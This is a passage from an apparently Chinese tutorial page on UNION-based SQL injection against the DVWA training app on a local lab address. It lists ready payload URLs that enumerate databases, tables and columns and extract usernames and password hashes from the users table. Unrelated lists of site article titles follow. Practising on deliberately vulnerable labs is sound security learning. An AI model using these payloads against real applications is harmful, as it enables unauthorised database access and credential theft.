substring_index(USER(),"@",l)--    #是将查询出来的结果进行切分,以@符号的方式切分

’ union select table_name,table_schema from information_schema.tables-- +   #查询数据库中所有的库表

  

查询所有数据库,数据表:

http://192.168.100.129/dvwa/vulnerabilities/sqli/

?id='+union+select+table_name,table_schema+from+information_schema.tables--+'

&Submit=Submit#


统计每个数据库中表的数量:

http://192.168.100.129/dvwa/vulnerabilities/sqli/

?id='+union+select+table_schema,count(*)+from+information_schema.tables group by table_schema--+'

&Submit=Submit#


查询每个库中对应的表:

http://192.168.100.129/dvwa/vulnerabilities/sqli/

?id='+union+select+table_name,table_schema from+information_schema.tables where table_schema='dvwa'--+'

&Submit=Submit#


查询user表中所有的列:

http://192.168.100.129/dvwa/vulnerabilities/sqli/

?id='+union+select+table_name,column_name from+information_schema.columns where table_schema='dvwa' and table_name='users'--+'

&Submit=Submit#


查询user表中的用户和密码:

http://192.168.100.129/dvwa/vulnerabilities/sqli/

?id='+union+select+user_id,password from dvwa.users --+'

&Submit=Submit#

最新文章

  1. html中table边框属性
  2. PHP多条件查询 (租房查询)
  3. Javascript模块化编程(二):AMD规范(转)
  4. MemCache分布式缓存的一个bug
  5. C# 绘制统计图(柱状图, 折线图, 扇形图)【转载】
  6. 畅所欲言第1期 - 从Viola&Jones的人脸检测说起
  7. CSS2-3常见的demo列子总结
  8. HDU 4287 Intelligent IME(string,map,stl,make_pair)
  9. Android中Json数据读取与创建
  10. java 覆盖hashCode()深入探讨 代码演示样例
  11. SQLite 对中文路径的支持(用到了StringToWideChar和Utf8Encode在D7的System单元中自带)
  12. 非常不错的ASP操作数据库类,支持多数据库MSSQL,ACCESS,ORACLE,MYSQL等
  13. iPhone、iPad强制关机
  14. Css的优先级机制
  15. notepad++代码输出电话号
  16. SwiftyiRate中文说明
  17. laravel实现批量添加数据
  18. 12C新特性--Application Continuity
  19. wamp因配置错误而导致apache无法启动的问题
  20. NodeJS错误处理最佳实践

热门文章

  1. 71、Android上对Cookie的读写操作
  2. python中WSGI是什么
  3. boost::interprocess::managed_shared_memory(2)(std::string)
  4. vue+node+mongoDB 火车票H5(四)---完成静态页面
  5. Angular ui-route的用法
  6. matplotlib图像中文乱码(python3.6)
  7. 测试一个服务器的性能,客户要求向数据库(Sqlserver2012)内 1000/s(每插入一千条数据) 的处理能力
  8. 解决EF6中表名变成复数的情况
  9. c++用vector创建二维数组
  10. XML 之快速入门